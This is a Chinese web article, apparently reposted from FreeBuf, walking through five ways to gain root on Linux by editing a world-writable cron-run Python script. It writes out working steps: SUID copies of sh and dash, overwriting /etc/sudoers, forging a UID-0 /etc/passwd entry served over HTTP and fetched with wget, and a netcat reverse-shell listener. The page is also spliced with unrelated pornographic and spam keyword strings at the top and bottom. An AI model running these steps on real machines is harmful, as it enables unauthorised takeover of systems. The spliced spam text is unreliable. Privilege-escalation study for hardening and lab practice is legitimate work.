国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

在Linux上通過可寫文件獲取Root權限的多種方式

系統 Linux 安全
在Linux中,一切都可以看做文件,包括所有允許/禁止讀寫執行權限的目錄和設備。當管理員為任何文件設置權限時,都應清楚并合理為每個Linux用戶分配應有的讀寫執行權限。在本文中我將為大家展示,如何利用Linux中具有寫入權限的文件/腳本來進行提權操作。

在Linux中,一切都可以看做文件,包括所有允許/禁止讀寫執行權限的目錄和設備。當管理員為任何文件設置權限時,都應清楚并合理為每個Linux用戶分配應有的讀寫執行權限。在本文中我將為大家展示,如何利用Linux中具有寫入權限的文件/腳本來進行提權操作。好了,話不多說。下面就進入我們的正題吧!

首先,我們來啟動我們的攻擊機并滲透進目標系統直至提權階段。這里假設我通過ssh成功登錄到了受害者機器,并訪問了非root用戶的終端。通過以下命令,我們可以枚舉所有具有可寫權限的二進制文件。

  1. find / -writable -type  f 2>/dev/null | grep -v "/proc/" 

可以看到在/lib/log路徑下有一個python文件,我們進入到該目錄并查看該文件的權限為777 

通過cat命令查看該文件內容,這是管理員添加的一個用來清除 /tmp中的所有垃圾文件的腳本,具體執行取決于管理員設置的定時間隔。獲取了這些信息后,攻擊者可以通過以下方式來執行提權操作。 

方法1

我們復制了/bin/sh到/tmp下并為/tmp/sh啟用了SUID。使用編輯器打開sanitizer.py并將 “rm -r /tmp/*” 中的內容替換為以下兩行: 

  1. os.system('cp /bin/sh /tmp/sh'
  2. os.system('chmod u+s /tmp/sh'

 

一段時間后,它將在/tmp目錄內創建一個具有SUID權限的sh文件,當你運行它時,你將會獲取root訪問權限。 

  1. cd /tmp 
  2. ls 
  3. ./sh 
  4. id 
  5. whoami 

下圖可以說明一切! 

方法2

同樣,你也可以將 “rm -r /tmp/*” 替換為以下內容:

  1. os.system(‘chmod u+s /bin/dash) 

 

一段時間后,它將為/bin/dash設置SUID權限,并且在運行時會給予root訪問權限。 

  1. /bin/dash 
  2. id 
  3. whoami 

如下圖所示: 

方法3

在這種方法中,我們在 rm -r /tmp/* 的位置粘貼了python反向shell連接代碼,并在新的終端中啟動了netcat偵聽。 

如上所述,經過一段時間后,我們通過netcat獲取了具有root訪問權限的反向shell。 

  1. nc -lvp 1234 
  2. id 
  3. whoami 

如下圖所示: 

方法4

這個方法挺有意思的,在下圖中大家可以看到我當前的用戶是沒有執行sudo命令的權限的。那我們就想辦法讓自己成為suoders文件成員。 

同樣,我們將 “rm -r /tmp/*” 替換為以下內容:

  1. os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers'

 

過一段時間后,當你輸入“sudo -l”命令時,你會注意到,它已成為了sudo用戶的成員。此時我們只要輸入“sudo bash”就可以獲取root訪問權限。 

  1. sudo -l 
  2. sudo bash 
  3. id 

方法5

我們知道passwd在任何類linux的系統中都扮演著非常重要的角色,一旦攻擊者有機會可以修改此文件,那么它將會成為一種特權提升的動態方式。

同樣,我們也不會忽視這一點,使用cat命令讀取etc/passwd文件。

在這里你可以觀察到用戶名為nemo記錄的高亮條目,根據我的猜測UID:1000 & GID:1000表示它應該是管理員組的成員。

但我們的目標是通過編輯nemo記錄,使其成為root組的成員。因此,我們選擇并復制etc/passwd文件內的所有記錄,然后將它粘貼到一個空的文本文件中。 

然后在一個新的終端中使用openssl生成一個加鹽密碼并復制。

  1. openssl passwd -1 -salt abc 123 

 

現在將上面復制的加鹽密碼粘貼至用戶nemo記錄條目中的“X”處,并且將UID&GID更改為0,如圖所示。操作完成后,將文本文件保存為“passwd”,將該文件傳輸至目標系統,它將覆蓋原始passwd文件的內容。

 

  1. cd Desktop 
  2. python -m SimpleHTTPServer 80 

 

同樣,將 “rm -r /tmp/*” 替換為以下內容:

  1. os.system(‘chmod u+s /bin/cp) 

一段時間后,它會啟用/bin/cp的SUID位以復制任意文件。 

現在將被你修改過的passwd文件下載至目標系統的/tmp目錄中。讓我們來檢查一下/bin/cp是否啟用了SUID位,然后使用cp命令將修改的passwd文件復制到/etc/passwd中,這將覆蓋原始passwd文件的內容。 

  1. cd /tmp 
  2. wget http://192.168.1.103/passwd 
  3. ls -al /bin/cp 
  4. cp passwd /etc/passwd 

 

現在,我們鍵入以下命令查看修改內容是否已在passwd文件中生效。

  1. tail /etc/passwd 

可以看到修改內容已成功寫入! 

執行以下命令獲取root訪問權限: 

  1. su nemo 
  2. password 123 
  3. whoami 

 

責任編輯:未麗燕 來源: FreeBuf
相關推薦

2018-06-22 10:18:52

2013-07-11 09:51:15

2022-08-14 19:27:16

LinuxmacOS

2009-11-23 17:16:54

PHP獲取IP

2013-11-01 11:32:49

2010-03-03 14:17:02

Linux內核

2017-05-10 15:16:29

Linux系統目錄讀寫指定目錄

2011-07-04 13:36:26

linuxOracle

2017-05-08 17:20:01

Linux指定目錄讀寫權限

2023-09-03 18:55:51

2019-02-19 10:30:29

VirtualBoxKali Linux虛擬機

2010-01-27 09:56:31

linux超級權限root密碼

2009-07-06 18:36:21

linux要求可寫但不可刪

2019-10-09 16:50:48

SSHLinux遠程系統

2022-11-18 08:55:33

2019-03-31 08:50:44

LinuxWine游戲

2012-03-02 12:14:19

JavaJstackJmap

2022-06-26 06:31:25

Linux電子游戲

2019-02-19 09:00:45

Linux創建文件命令

2020-06-23 14:21:35

Linux系統功能
點贊
收藏

51CTO技術棧公眾號

国产精品美乳一区二区免费| 成人avav影音| 亚洲欧美日韩中文在线| 狠狠色综合一区二区| 欧美亚洲国产日韩| 中文字幕一区二区精品| 免费特级黄色片| 日韩成人免费看| 狠狠色综合网站久久久久久久| 91欧美日韩| 欧美体内谢she精2性欧美| 永久免费的av网站| 国产色综合久久| 中文精品无码中文字幕无码专区 | 久久久久久亚洲精品不卡| 亚洲桃色在线一区| 懂色av一区二区三区蜜臀| 亚洲日穴在线视频| 三级在线免费观看| 国产午夜精品一区二区三区欧美| 国产情人节一区| 国产欧美久久一区二区三区| 亚洲激情男女视频| 国产二区视频在线播放| 乱中年女人伦av一区二区| 伊人一区二区三区久久精品 | 欧美激情一区二区三区久久久| 美女色狠狠久久| 日韩在线视频中文字幕| 爱情岛论坛成人| 国产亚洲福利社区一区| 欧美a在线视频| 国产精品视频第一区| 丁香婷婷激情| 欧美日韩在线视频观看| 懂色一区二区三区| av午夜一区麻豆| 国产色婷婷国产综合在线理论片a| 国产一区二区三区四区二区| 国产成人97精品免费看片| 欧美日韩有码| 一个人看的www久久| 二吊插入一穴一区二区| 久久成人综合视频| 国产精品一区2区3区| www.久久草| 蜜桃视频第一区免费观看| 超碰在线亚洲| 日韩欧美一级片| 无遮挡爽大片在线观看视频 | 欧美va天堂在线| 亚洲视频免费一区| 国产成人免费| 色综合色综合色综合| 川上优的av在线一区二区| 日韩精品一区国产麻豆| 成人国产精品入口免费视频| 国产+人+亚洲| 一区精品久久| 538国产精品一区二区免费视频| 国产美女在线观看| 欧美极品另类videosde| 簧片在线观看| 亚洲国产精品yw在线观看 | 国产一区亚洲二区三区| 亚洲电影一区二区三区| 羞羞视频在线观看免费| 一二三四社区欧美黄| 二区三区在线观看| 日韩最新免费不卡| 久久精品不卡| 性一交一乱一伧国产女士spa| 亚洲综合无码一区二区| 超碰在线cao| 国产精品wwww| 国产一区二区视频在线播放| 99热最新在线| 国产成人午夜精品5599| 一级黄色av| 亚洲精品一区中文| 日韩欧美一区二区三区在线视频 | 国产日产欧美视频| 色婷婷精品久久二区二区蜜臀av | 久久一区二区中文字幕| 丰满人妻一区二区三区53号| 五月天婷婷综合| 国产一区二区主播在线| 97久草视频| 国产日韩欧美精品电影三级在线 | 欧美午夜一区二区三区免费大片| 国语自产精品视频在线看抢先版结局| 91国模大尺度私拍在线视频| jizz内谢中国亚洲jizz| 欧美一区二区三区视频免费| 精品国产一区二区三区四区阿崩| 精品裸体舞一区二区三区| 精品三级久久久久久久电影聊斋| 日韩视频免费在线| 欧美一级视频| 在线国产小视频| 97色在线视频观看| 国产·精品毛片| 亚洲1卡2卡3卡4卡乱码精品| 欧美激情视频一区二区三区不卡| 免费人成精品欧美精品| 青青草免费在线视频| 天天影视涩香欲综合网| 福利一区二区| 欧美日韩在线一区二区三区| 亚洲福利一区二区| 黄色欧美在线| 激情综合网俺也去| 中文字幕av一区二区| 影音先锋久久| 青青草手机在线| 国产精品美女av| 国产日本亚洲高清| 欧美成a人片免费观看久久五月天| 一区二区三区免费看| 首页国产欧美日韩丝袜| 蜜桃欧美视频| 日韩欧美在线视频| 精品国内自产拍在线观看视频| 精品99在线视频| 深夜福利91大全| 成人av在线资源| 99久久婷婷国产综合精品首页| 综合久久国产| 欧美xxxx老人做受| 石原莉奈一区二区三区在线观看| av在线1区2区| 亚洲国内精品在线| 日本在线播放一区二区三区| 免费黄色电影在线观看| 精品一区国产| 日韩一区二区三区免费看| 成人线上视频| 亚洲午夜精品久久久中文影院av| 日韩一区二区电影网| 天堂影院一区二区| 日韩欧美精品一区二区三区| 天天爱天天做天天操| 在线成人中文字幕| 国产亚洲精品资源在线26u| 国产精品对白久久久久粗| 国产激情99| 色是在线视频| 国外成人福利视频| 麻豆精品网站| 91麻豆精品国产自产在线| 九一久久久久久| 国产偷国产偷精品高清尤物 | a√免费观看在线网址www| av之家在线观看| 亚洲人体一区| 99爱免费视频| 亚洲一区二区三区四区在线观看 | 日韩欧美在线观看视频| 自拍偷拍亚洲综合| 亚洲五码在线| 欧洲日本在线| av资源网站在线观看| 高清美女视频一区| 国产福利91精品一区二区| 欧美日韩亚洲一区三区| 国产最新视频在线| 自拍自偷一区二区三区| 日韩国产一区二| 国产一区二区三区四区五区美女| 好吊一区二区三区| 99re国产精品| 久久国产日韩欧美精品| 毛片在线播放网站| 91视频国产一区| 97超级碰碰碰久久久| 免费观看国产成人| 最近中文字幕一区二区| 欧洲一区二区日韩在线视频观看免费 | 久久黄色片视频| √…a在线天堂一区| 国产亚洲精品久久久久动| 久久久激情视频| 高跟丝袜欧美一区| 99精品视频在线免费观看| 国产一区二区h| 国产成人精品亚洲777人妖| 亚洲精品国产精品乱码不99| 伊人色综合久久天天人手人婷| 国产一区二区三区三区在线观看| 日本精品视频在线播放| 91成人在线观看喷潮教学| 色总=综合色| 青青草视频在线免费直播| 国产一区二区欧美| 成人三级伦理片| 在线观看日韩一区| 国产精品久久久久久久久久新婚| 欧美精品一区二区三区免费播放| 高清在线视频不卡| 国产成人午夜精品影院观看视频 |